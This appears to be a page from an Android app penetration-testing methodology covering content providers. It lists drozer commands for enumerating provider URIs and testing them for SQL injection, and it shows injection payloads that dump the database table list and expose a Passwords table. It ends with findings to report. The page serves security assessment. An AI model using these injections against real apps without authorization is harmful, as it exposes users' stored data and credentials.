search

3.4.2 ContentProvider

hashtag
DROZER

Info:

run app.provider.info -a com.x.x.x

Path guessing & determining accessible content:

run scanner.provider.finduris -a com.x.x.x

Use URIs from above or guess yourself: (in addition: .insert / .update / .delete)

run app.provider.query content://<URI> --vertical

Test content providers for SQL-Injection:

run scanner.provider.injection -a com.x.x.x

Find tables accessible through SQL-Injection:

run scanner.provider.sqltables -a com.x.x.x

hashtag
SQLi

list all db tables

run app.provider.query content://com.x.x.x.ProviderName/path/ --prjection "* FROM SQLITE_MASTER WHERE type='table';--"
run app.provider.query content://com.x.x.x.ProviderName/path/ --projection "'" unrecognized token: "' FROM Passwords" (code 1): , while compiling: SELECT ' FROM Passwords
run app.provider.query content://com.x.x.x.ProviderName/path/ --selection "'" unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')

Example - retrieve data from otherwise protected tables:

hashtag
FILESYSTEM-CP

Download db:

Find content provider that are susceptible to directory-traversal:

Example (/etc/hosts is world-readable -> no biggy)

or

hashtag
ADB

hashtag
THINGS TO REPORT

triangle-exclamation

  • Inproper use of permissions (no path permissions, no READ/WRITE permissions)

  • If SQL Injection is possible

    • If weak hash-function was used (like MD5) on passwords or other sensitive data

  • Accessed db-files

Previous3.4.1 ActivitiesNext3.4.3 Services

Last updated